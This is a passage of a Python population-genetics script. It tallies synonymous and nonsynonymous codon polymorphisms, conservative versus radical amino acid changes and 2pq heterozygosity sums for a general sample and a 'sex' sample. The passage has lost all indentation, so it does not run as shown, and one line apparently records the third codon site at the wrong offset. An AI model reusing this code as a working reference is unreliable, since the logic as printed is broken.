sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0])
for aa in aaList:
sys.stdout.write(';' + aa + '\tP\tN\n')
if len(aaList) > 1:
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
else:
mutType = ''
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + aaList[0])
for aa in aaList:
logfile.write(';' + aa)
logfile.write('\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0])
for aa in aaList:
sys.stdout.write(';' + aa + '\tP\tN\n')
if len(aaList) > 1:
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
else:
mutType = ''
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + aaList[0])
for aa in aaList:
logfile.write(';' + aa)
logfile.write('\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
else:
if ab > ac and ab > bc:
codonList1 = [codonC,codonB]
codonList2 = [codonC,codonA]
elif ac > ab and ac > bc:
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
elif bc > ab and bc > ac:
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
aaList1 = []
aaList2 = []
for comp in codonList1:
if i < 3:
if comp in startCodons:
aaList1.append('M')
else:
aaList1.append(geneticCode[comp])
else:
aaList1.append(geneticCode[comp])
for comp in codonList2:
if i < 3:
if comp in startCodons:
aaList2.append('M')
else:
aaList2.append(geneticCode[comp])
else:
aaList2.append(geneticCode[comp])
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sum2PQ_S += twoPQ1
sum2PQ_N += twoPQ2
synS += 1
nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ2
else:
rad1S += 1
sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ2
else:
rad2S += 1
sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ2
else:
rad3S += 1
sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ2
else:
rad4S += 1
sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ2
else:
rad5S += 1
sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ2
else:
rad6S += 1
sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ2
else:
rad7S += 1
sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ2
else:
meanRadS += 1
sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
nsynS += 1
synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sum2PQ_S += twoPQ2
sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ1
else:
rad1S += 1
sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ1
else:
rad2S += 1
sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ1
else:
rad3S += 1
sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ1
else:
rad4S += 1
sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ1
else:
rad5S += 1
sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ1
else:
rad6S += 1
sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ1
else:
rad7S += 1
sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ1
else:
meanRadS += 1
sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ1
else:
rad1S += 1
sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ1
else:
rad2S += 1
sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ1
else:
rad3S += 1
sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ1
else:
rad4S += 1
sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ1
else:
rad5S += 1
sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ1
else:
rad6S += 1
sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ1
else:
rad7S += 1
sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ1
else:
meanRadS += 1
sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ2
else:
rad1S += 1
sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ2
else:
rad2S += 1
sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ2
else:
rad3S += 1
sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ2
else:
rad4S += 1
sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ2
else:
rad5S += 1
sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ2
else:
rad6S += 1
sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ2
else:
rad7S += 1
sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ2
else:
meanRadS += 1
sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif len(currAlleleDict) == 2:
currFreqDict = {}
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
twoPQ *= freq
currFreqDict[codon] = freq
if len(aaList) == 1:
synS += 2
sum2PQ_S += (2*twoPQ)
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + ';' + aaList[1] + '\tP\tN\n')
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + aaList[0] + ';' + aaList[1] + '\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN\n')
if len(aaList) > 1:
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
else:
mutType = ''
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + aaList[0])
for aa in aaList:
logfile.write(';' + aa)
logfile.write('\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
i += 1
logfile.write('\nTotal substitutions\n\n')
sys.stdout.write('\n\nTotal Substitutions\nGene\tSite\tCodon\tAlleles\tAAs\tPol/Div\tMutation Type\t1\t2\t3\t4\t5\t6\t7\tC/R Index\n')
codonList = []
dS = 0
dN = 0
dC1 = 0
dC2 = 0
dC3 = 0
dC4 = 0
dC5 = 0
dC6 = 0
dC7 = 0
dR1 = 0
dR2 = 0
dR3 = 0
dR4 = 0
dR5 = 0
dR6 = 0
dR7 = 0
dMeanC = 0
dMeanR = 0
for site in popInvariantSites:
gene = False
for locus in positionDict:
start = locus[0]
stop = locus[1]
if i >= start and i <= stop:
gene = positionDict[locus]
if site%3 == 0:
site1 = site
site2 = site + 1
site3 = site + 2
elif site%3 == 1:
site1 = site - 1
site2 = site
site3 = site + 1
elif site%3 == 2:
site1 = site - 2
site2 = site - 1
site3 = site
inNuc = refSeq[site]
outNuc = outSeq[site]
inSite = refSeq[site1:site3+1]
outSite = outSeq[site1:site3+1]
if inNuc != outNuc and 'N' not in inSite and 'N' not in outSite and '-' not in inSite and '-' not in outSite and site/3 not in codonList:
codonList.append(site/3)
aaList = []
if site < 3 and inSite in startCodons:
aaList.append('M')
inAA = 'M'
else:
aaList.append(geneticCode[inSite])
inAA = geneticCode[inSite]
if site < 3 and outSite in startCodons:
if 'M' not in aaList:
aaList.append('M')
outAA = 'M'
elif geneticCode[outSite] not in aaList:
outAA = geneticCode[outSite]
aaList.append(geneticCode[outSite])
else:
outAA = geneticCode[outSite]
if site1 in popPolymorphicSites or site2 in popPolymorphicSites or site3 in popPolymorphicSites:
logfile.write('Codon ' + str(1 + (site/3)) + 'has one or more polymorphic sites\n\t' + inSite + ',' + outSite + '\t' + inAA + ',' + outAA + '\n')
sys.stdout.write(str(gene) + '\t' + str(site + 1) + '\t' + str((site/3) + 1) + '\t' + inSite + ',' + outSite + '\t' + inAA + ',' + outAA + '\tD\t\t\t\t\t\t\t\t\t\n')
else:
site1List = [inSite[0]]
site2List = [inSite[1]]
site3List = [inSite[2]]
if outSite[0] not in site1List:
site1List.append(outSite[0])
if outSite[1] not in site2List:
site2List.append(outSite[1])
if outSite[2] not in site3List:
site3List.append(outSite[2])
totalChanges = (len(site1List) - 1) + (len(site2List) - 1) + (len(site3List) - 1)
if totalChanges == 1:
sys.stdout.write(str(gene) + '\t' + str(site + 1) + '\t' + str((site/3) + 1) + '\t' + inSite + ';' + outSite)
if len(aaList) == 2:
dN += 1
sys.stdout.write('\t' + aaList[0] + ';' + aaList[1] + '\tD\tN')
mutType = CRI(aaList)
for item in mutType:
sys.stdout.write('\t' + str(item))
sys.stdout.write('\n')
if mutType[0] == 0:
dC1 += 1
else:
dR1 += 1
if mutType[1] == 0:
dC2 += 1
else:
dR2 += 1
if mutType[2] == 0:
dC3 += 1
else:
dR3 += 1
if mutType[3] == 0:
dC4 += 1
else:
dR4 += 1
if mutType[4] == 0:
dC5 += 1
else:
dR5 += 1
if mutType[5] == 0:
dC6 += 1
else:
dR6 += 1
if mutType[6] == 0:
dC7 += 1
else:
dR7 += 1
if mutType[7] <= 0.5:
dMeanC += 1
else:
dMeanR += 1
else:
dS += 1
sys.stdout.write('\t-\tD\tS\t-\t-\t-\t-\t-\t-\t-\t-\n')
else:
if len(aaList) == 2:
mutType = CRI(aaList)
logfile.write('Codon ' + str((site/3) + 1) + ' has a complex evolutionary history\n\t' + inSite + ',' + outSite + '\t' + inAA + ',' + outAA + '\t' + str(mutType) + '\n')
sys.stdout.write(str(gene) + '\t' + str(site + 1) + '\t' + str((site/3) + 1) + '\t' + inSite + ',' + outSite + '\t' + inAA + ',' + outAA + '\tD\t\t\t\t\t\t\t\t\t\n')
else:
logfile.write('Codon ' + str((site/3) + 1) + ' has a complex evolutionary history\n\t' + inSite + ',' + outSite + '\t' + inAA + ',' + outAA + '\n')
sys.stdout.write(str(gene) + '\t' + str(site + 1) + '\t' + str((site/3) + 1) + '\t' + inSite + ',' + outSite + '\t' + inAA + ',' + outAA + '\tD\tS\t\t\t\t\t\t\t\t\n')
sum2PQ_S = str(sum2PQ_S)
sum2PQ_N = str(sum2PQ_N)
sum2PQ_C1 = str(sum2PQ_C1)
sum2PQ_C2 = str(sum2PQ_C2)
sum2PQ_C3 = str(sum2PQ_C3)
sum2PQ_C4 = str(sum2PQ_C4)
sum2PQ_C5 = str(sum2PQ_C5)
sum2PQ_C6 = str(sum2PQ_C6)
sum2PQ_C7 = str(sum2PQ_C7)
sum2PQ_R1 = str(sum2PQ_R1)
sum2PQ_R2 = str(sum2PQ_R2)
sum2PQ_R3 = str(sum2PQ_R3)
sum2PQ_R4 = str(sum2PQ_R4)
sum2PQ_R5 = str(sum2PQ_R5)
sum2PQ_R6 = str(sum2PQ_R6)
sum2PQ_R7 = str(sum2PQ_R7)
sum2PQ_meanC = str(sum2PQ_meanC)
sum2PQ_meanR = str(sum2PQ_meanR)
synS = str(synS)
nsynS = str(nsynS)
con1S = str(con1S)
con2S = str(con2S)
con3S = str(con3S)
con4S = str(con4S)
con5S = str(con5S)
con6S = str(con6S)
con7S = str(con7S)
meanConS = str(meanConS)
rad1S = str(rad1S)
rad2S = str(rad2S)
rad3S = str(rad3S)
rad4S = str(rad4S)
rad5S = str(rad5S)
rad6S = str(rad6S)
rad7S = str(rad7S)
meanRadS = str(meanRadS)
logfile.write('Sex polymorphisms\n')
sys.stdout.write('\n\nSex Polymorphisms\nGene\tSite\tCodon\tAlleles\tAAs\tPol/Div\tMutation Type\t1\t2\t3\t4\t5\t6\t7\tC/R Index\t2*pq\n')
sex_sum2PQ_S = 0
sex_sum2PQ_N = 0
sex_sum2PQ_C1 = 0
sex_sum2PQ_C2 = 0
sex_sum2PQ_C3 = 0
sex_sum2PQ_C4 = 0
sex_sum2PQ_C5 = 0
sex_sum2PQ_C6 = 0
sex_sum2PQ_C7 = 0
sex_sum2PQ_R1 = 0
sex_sum2PQ_R2 = 0
sex_sum2PQ_R3 = 0
sex_sum2PQ_R4 = 0
sex_sum2PQ_R5 = 0
sex_sum2PQ_R6 = 0
sex_sum2PQ_R7 = 0
sex_sum2PQ_meanC = 0
sex_sum2PQ_meanR = 0
sex_synS = 0
sex_nsynS = 0
sex_con1S = 0
sex_con2S = 0
sex_con3S = 0
sex_con4S = 0
sex_con5S = 0
sex_con6S = 0
sex_con7S = 0
sex_meanConS = 0
sex_rad1S = 0
sex_rad2S = 0
sex_rad3S = 0
sex_rad4S = 0
sex_rad5S = 0
sex_rad6S = 0
sex_rad7S = 0
sex_meanRadS = 0
i = 0
while i < len(codonDict[seqList[0]]):
outCodon = outCodons[i]
gene = False
for locus in positionDict:
start = locus[0]
stop = locus[1]
if i*3 >= start and i*3 <= stop:
gene = positionDict[locus]
currAlleleDict = {}
currAlleleList = []
currAADict = {}
for seq in sexList:
currCodons = codonDict[seq]
currCodon = currCodons[i]
if currCodon not in currAlleleDict and 'N' not in currCodon and '-' not in currCodon:
currAlleleDict[currCodon] = 1
currAlleleList.append(currCodon)
elif 'N' not in currCodon and '-' not in currCodon:
currValue = currAlleleDict[currCodon]
currValue += 1
currAlleleDict[currCodon] = currValue
if len(currAlleleDict) > 1:
totalIndividuals = 0
site1 = []
site2 = []
site3 = []
for codon in currAlleleList:
totalIndividuals += currAlleleDict[codon]
if codon[0] not in site1:
site1.append(codon[0])
if codon[1] not in site2:
site2.append(codon[1])
if codon[2] not in site3:
site3.append(codon[2])
currFreqDict = {}
totalChanges = (len(site1) - 1) + (len(site2) - 1) + (len(site3) - 1)
variableSites = []
if len(site1) > 1:
variableSites.append(i*3)
if len(site2) > 1:
variableSites.append((i*3) + 1)
if len(site3) > 1:
variableSites.append((i*3) + 1)
aaList = []
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
if i == 0 and codon in startCodons:
aa = 'M'
else:
aa = geneticCode[codon]
currAADict[codon] = aa
if aa not in aaList:
aaList.append(aa)
if totalChanges == 1:
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
twoPQ *= freq
if len(aaList) == 1:
sex_synS += 1
sex_sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
sex_nsynS += 1
sex_sum2PQ_N += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + ';' + aaList[1] + '\tP\tN')
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ) + '\n')
elif totalChanges == 2:
if len(currAlleleDict) == 3:
ab = 0
ac = 0
bc = 0
codonA = currAlleleList[0]
codonB = currAlleleList[1]
codonC = currAlleleList[2]
if codonA[0] != codonB[0]:
ab += 1
if codonA[1] != codonB[1]:
ab += 1
if codonA[2] != codonB[2]:
ab += 1
if codonA[0] != codonC[0]:
ac += 1
if codonA[1] != codonC[1]:
ac += 1
if codonA[2] != codonC[2]:
ac += 1
if codonC[0] != codonB[0]:
bc += 1
if codonC[1] != codonB[1]:
bc += 1
if codonC[2] != codonB[2]:
bc += 1
if ab == ac and ac == bc:
if 'N' not in outCodon and '-' not in outCodon:
if outCodon == codonA:
aaList1 = [currAADict[codonA],currAADict[codonB]]
aaList2 = [currAADict[codonA],currAADict[codonC]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
sex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sex_sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_S += twoPQ1
sex_sum2PQ_N += twoPQ2
sex_synS += 1
sex_nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
